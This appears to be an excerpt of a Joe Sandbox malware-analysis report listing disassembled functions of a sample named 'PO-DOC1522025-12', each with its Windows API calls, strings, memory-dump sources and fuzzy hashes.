Instruction Fuzzy Hash: F541DA38605BCA6DFF3197B0C8443B5BEE06F13354F04805ADAC65A5C2EBA599C8C792

Function 001C055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 001C05BC
inet_addr.WSOCK32(?), ref: 001C061C
gethostbyname.WSOCK32(?), ref: 001C0628
IcmpCreateFile.IPHLPAPI ref: 001C0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001C06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001C06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 001C07B9
WSACleanup.WSOCK32 ref: 001C07BF

Strings

Ping, xrefs: 001C0676

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 960672e4682cb1b6dafc398f59cd034e9edc882f97da7261d12ed5891a1d6d82
Instruction ID: 3c68d58e774a66d93033247f8b87c5f5ce2f59de32947aae696fc1f3f9dceff3
Opcode Fuzzy Hash: 960672e4682cb1b6dafc398f59cd034e9edc882f97da7261d12ed5891a1d6d82
Instruction Fuzzy Hash: 3E918C35609301DFD725CF15C889F1ABBE0AF58318F1589ADE4A98BAA2C730ED45CF81

Function 001C8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 001C8CF3

Part of subcall function 001A8E54: _wcslen.LIBCMT ref: 001A8E77

_wcslen.LIBCMT ref: 001C8D4E
_wcslen.LIBCMT ref: 001C8D9C
_wcslen.LIBCMT ref: 001C8DDC
_wcslen.LIBCMT ref: 001C8E6E

Strings

cdecl, xrefs: 001C8D48, 001C8D4D
stdcall, xrefs: 001C8DD6, 001C8DDB
winapi, xrefs: 001C8D96, 001C8D9B
none, xrefs: 001C8E65, 001C8E6A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 39faa4d8c63ad9583ae6ca829e5ac1ed4f722eaa9d0a835c83d84dbd2710f8b3
Instruction ID: eaf1fbe081c803483e1e15260c6dc36add7bd0b98133a2308fe51aabc882376f
Opcode Fuzzy Hash: 39faa4d8c63ad9583ae6ca829e5ac1ed4f722eaa9d0a835c83d84dbd2710f8b3
Instruction Fuzzy Hash: 8F518F31A001169BCB14DFACC991ABEB7A6BF75724B21422DE826E72C5DB31DD40C790

Function 001C372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 001C3774
CoUninitialize.OLE32 ref: 001C377F
CoCreateInstance.OLE32(?,00000000,00000017,001DFB78,?), ref: 001C37D9
IIDFromString.OLE32(?,?), ref: 001C384C
VariantInit.OLEAUT32(?), ref: 001C38E4
VariantClear.OLEAUT32(?), ref: 001C3936

Strings

Invalid parameter, xrefs: 001C3865
NULL Pointer assignment, xrefs: 001C381E
Failed to create object, xrefs: 001C37E4, 001C389A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 849e7135b00b5d329598c41e81aa550b236eb50135ee9d16d8797fec4c16cd00
Instruction ID: bf15afba8726334addbc7097291549a00c1b66dbe7a856ffedaed916f494ffbc
Opcode Fuzzy Hash: 849e7135b00b5d329598c41e81aa550b236eb50135ee9d16d8797fec4c16cd00
Instruction Fuzzy Hash: 5661C370608301AFD711DF54C889F6ABBE4EF69714F00891DF9959B2A1D770EE48CB92

Function 001D8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

Part of subcall function 0015912D: GetCursorPos.USER32(?), ref: 00159141
Part of subcall function 0015912D: ScreenToClient.USER32(00000000,?), ref: 0015915E
Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000001), ref: 00159183
Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000002), ref: 0015919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 001D8B6B
ImageList_EndDrag.COMCTL32 ref: 001D8B71
ReleaseCapture.USER32 ref: 001D8B77
SetWindowTextW.USER32(?,00000000), ref: 001D8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001D8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 001D8CFF

Strings

@GUI_DRAGFILE, xrefs: 001D8C9A
@GUI_DROPID, xrefs: 001D8C51
p#!, xrefs: 001D8C71

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#!
API String ID: 1924731296-820919411
Opcode ID: 48afc230e53b759df8f28bac9feb3bf8a83ed96bb7cb9d624355654c90293f25
Instruction ID: 2fd38cefc762e5a6e1cde0adf8f8417b016110b6096cd2bafb43471713bbafc5
Opcode Fuzzy Hash: 48afc230e53b759df8f28bac9feb3bf8a83ed96bb7cb9d624355654c90293f25
Instruction Fuzzy Hash: FF51AC70205300AFD704DF14DC9AFAA77E4FB98710F000A2EF966972E1DB70A954CBA2

Function 001B3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001B33CF

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001B33F0

Strings

Line %d (File "%s"):, xrefs: 001B3443, 001B345C
"%s" (%d) : ==> %s:%s%s, xrefs: 001B3504
"%s" (%d) : ==> %s:, xrefs: 001B3522
^ ERROR , xrefs: 001B349E
Error: , xrefs: 001B34D1
Incorrect parameters to object property !, xrefs: 001B34AB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: e7cca34107e5ee14919a8213a327e1db8124ec0d9a36de3417cf1450c06c3718
Instruction ID: 62c575dc89f6ba4c62de2394e30dc384a4edf870030e7e2fc64da3955ac13335
Opcode Fuzzy Hash: e7cca34107e5ee14919a8213a327e1db8124ec0d9a36de3417cf1450c06c3718
Instruction Fuzzy Hash: 6F51907290020AAADF15EBE0DD46EEEB778AF25340F104165F515720A2EB316FA8DB61

Function 001AB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001AB5FC
_wcslen.LIBCMT ref: 001AB608
_wcslen.LIBCMT ref: 001AB64D
_wcslen.LIBCMT ref: 001AB68C
_wcslen.LIBCMT ref: 001AB6C7

Strings

REMOVE, xrefs: 001AB602, 001AB607
APPEND, xrefs: 001AB6C1, 001AB6C6
EXISTS, xrefs: 001AB686, 001AB68B
KEYS, xrefs: 001AB647, 001AB64C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: cae36faeb0112128c1b4e21a17ebeaaf5375141cf3a953a7c10d5723a8f2b109
Instruction ID: df4484db94f4cfb13c562dd48f70e79270ca9179c6cf0d0ee7c11439b9a26e74
Opcode Fuzzy Hash: cae36faeb0112128c1b4e21a17ebeaaf5375141cf3a953a7c10d5723a8f2b109
Instruction Fuzzy Hash: 88413936A081678BCB105F7DCCD05BEB7A1EF72754B254129E429DB282E731CC81C390

Function 001B5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001B53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001B5416
GetLastError.KERNEL32 ref: 001B5420
SetErrorMode.KERNEL32(00000000,READY), ref: 001B54A7

Strings

READONLY, xrefs: 001B5452
INVALID, xrefs: 001B5459
UNKNOWN, xrefs: 001B5444
READY, xrefs: 001B5460, 001B5468
NOTREADY, xrefs: 001B544B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 56f7f78bc32b1745e098f2668714aec8049089bae6413de437770e550fcc63e1
Instruction ID: 644d5c97d02463f932258ad0b71a709764fb002837ae146bdc53d1a6e7eda986
Opcode Fuzzy Hash: 56f7f78bc32b1745e098f2668714aec8049089bae6413de437770e550fcc63e1
Instruction Fuzzy Hash: 9B31A135A00605DFD714DF68C488BEABBB5EF55305F148065E405CF2A2EB71ED86CBA0

Function 001D3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 001D3C79
SetMenu.USER32(?,00000000), ref: 001D3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D3D10
IsMenu.USER32(?), ref: 001D3D24
CreatePopupMenu.USER32 ref: 001D3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D3D5B
DrawMenuBar.USER32 ref: 001D3D63

Strings

F, xrefs: 001D3D4E
0, xrefs: 001D3C54

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 4aa73e0173ea4efcc5bfec58dda3a7cbf0c682134870f011745b8095f9d42431
Instruction ID: de40995df5db21721d3ef82138ab9519ad11fa9f2e757dc2a2bd5634c2699962
Opcode Fuzzy Hash: 4aa73e0173ea4efcc5bfec58dda3a7cbf0c682134870f011745b8095f9d42431
Instruction Fuzzy Hash: 43417E75A0260AEFDF14CFA4E844ADA77B6FF49350F14052AF95697360D730AA10CF91

Function 001D3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001D3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001D3AA0
GetWindowLongW.USER32(?,000000F0), ref: 001D3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001D3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001D3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001D3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001D3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001D3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001D3C13

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 5cb6f9cd3e54ac3624e50a11c91c4524dac2eeb85051e6e5a2aa85706ed33f4f
Instruction ID: 6ae1a3f6e54c0d606741af4f1d593ea292b855acd1c33621dcf672e7e5663d41
Opcode Fuzzy Hash: 5cb6f9cd3e54ac3624e50a11c91c4524dac2eeb85051e6e5a2aa85706ed33f4f
Instruction Fuzzy Hash: B0616A75A00208AFDB10DFA8CC85EEE77B8EB19700F10419AFA25A73A1D770AE55DB50

Function 00172C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00172C94

Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0

_free.LIBCMT ref: 00172CA0
_free.LIBCMT ref: 00172CAB
_free.LIBCMT ref: 00172CB6
_free.LIBCMT ref: 00172CC1
_free.LIBCMT ref: 00172CCC
_free.LIBCMT ref: 00172CD7
_free.LIBCMT ref: 00172CE2
_free.LIBCMT ref: 00172CED
_free.LIBCMT ref: 00172CFB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2baf68e42677bab7ec403361dcfab9c94e36466ff95845822e41e8aa746aaee6
Instruction ID: 5812c7a037441d541cf340bbb0ccae2e9635aaadb43f0c079ef29f593c2aad59
Opcode Fuzzy Hash: 2baf68e42677bab7ec403361dcfab9c94e36466ff95845822e41e8aa746aaee6
Instruction Fuzzy Hash: 3D11C376100118AFCB02EF64D882CDD7BB5FF19354F4584A4FA4C9B222DB31EA919B90

Function 00141410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00141459
OleUninitialize.OLE32(?,00000000), ref: 001414F8
UnregisterHotKey.USER32(?), ref: 001416DD
DestroyWindow.USER32(?), ref: 001824B9
FreeLibrary.KERNEL32(?), ref: 0018251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0018254B

Strings

close all, xrefs: 00141454

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: c3a5bfb353b2eceee935e694e0fa12ff9a5b8a6abdb6c790f3570980e48090e4
Instruction ID: d1f67b834ec18a870cfdf7fd0dd9c75832527e6cf3f84fbaa3a2060cc3346bd4
Opcode Fuzzy Hash: c3a5bfb353b2eceee935e694e0fa12ff9a5b8a6abdb6c790f3570980e48090e4
Instruction Fuzzy Hash: 7FD17131702212DFCB1AEF14D499B69F7A4BF15700F2542ADE84A6B262DB30ED56CF90

Function 001B7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B7FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 001B7FC1
GetFileAttributesW.KERNEL32(?), ref: 001B7FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 001B8005
SetCurrentDirectoryW.KERNEL32(?), ref: 001B8017
SetCurrentDirectoryW.KERNEL32(?), ref: 001B8060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001B80B0

Strings

*.*, xrefs: 001B8066

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 7558e4092b0793f039ab0a387a5ca65a525c92b7441749133b79dad07adad356
Instruction ID: 63deb88b8c04e97fc869f08748b1236ced7edc80212617a7c9764f8b602a7033
Opcode Fuzzy Hash: 7558e4092b0793f039ab0a387a5ca65a525c92b7441749133b79dad07adad356
Instruction Fuzzy Hash: 4F818F725082019BCB24EF14C844AAEB3E8BFD9754F144C5EF885DB2A0EB35DD49CB92

Function 00145BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00145C7A

Part of subcall function 00145D0A: GetClientRect.USER32(?,?), ref: 00145D30
Part of subcall function 00145D0A: GetWindowRect.USER32(?,?), ref: 00145D71
Part of subcall function 00145D0A: ScreenToClient.USER32(?,?), ref: 00145D99

GetDC.USER32 ref: 001846F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00184708
SelectObject.GDI32(00000000,00000000), ref: 00184716
SelectObject.GDI32(00000000,00000000), ref: 0018472B
ReleaseDC.USER32(?,00000000), ref: 00184733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001847C4

Strings

U, xrefs: 00184693

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 79110dd7ab7949b648bf1e5cf4dc2a996157d0763199f4d4c40d0a5d22b46fc1
Instruction ID: d6390585c9df76f052e5e05c9a4c817f62e71aaddd0df34b6386fbfdb95ab669
Opcode Fuzzy Hash: 79110dd7ab7949b648bf1e5cf4dc2a996157d0763199f4d4c40d0a5d22b46fc1
Instruction Fuzzy Hash: 73712430400206DFCF25EF64C984AFA3BB6FF5A360F24422AED515A266CB308E81DF50

Function 001B359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001B35E4

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

LoadStringW.USER32(00212390,?,00000FFF,?), ref: 001B360A

Strings

^ ERROR, xrefs: 001B36C9
Line %d (File "%s"):, xrefs: 001B366B
"%s" (%d) : ==> %s:, xrefs: 001B3742
"%s" (%d) : ==> %s:%s%s, xrefs: 001B3724
Error: , xrefs: 001B36EF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 5457b6998582b834f69f03c43c326c13b7d4405d73d3f879bac4ff526b9a0ddf
Instruction ID: b8c0a9de77efae07e9a3c7d6890ad8969312bea64b2fbd8d7f776ceb25ed6541
Opcode Fuzzy Hash: 5457b6998582b834f69f03c43c326c13b7d4405d73d3f879bac4ff526b9a0ddf
Instruction Fuzzy Hash: 2C51607290020ABADF14EFA0DC46EEEBB78AF25300F144165F515721A2DF311BA9DFA1

Function 001BC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001BC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001BC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001BC2CA
GetLastError.KERNEL32 ref: 001BC322
SetEvent.KERNEL32(?), ref: 001BC336
InternetCloseHandle.WININET(00000000), ref: 001BC341

Strings

, xrefs: 001BC2BB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: a599e7b3fe8cf7e937dcf8e93af8a2c9d9ebf8f4ea4b44cdf9599be449650e20
Instruction ID: c9e676346adff867f74b3a270fea34c6982442845a6dd7d09aabefb177a5e480
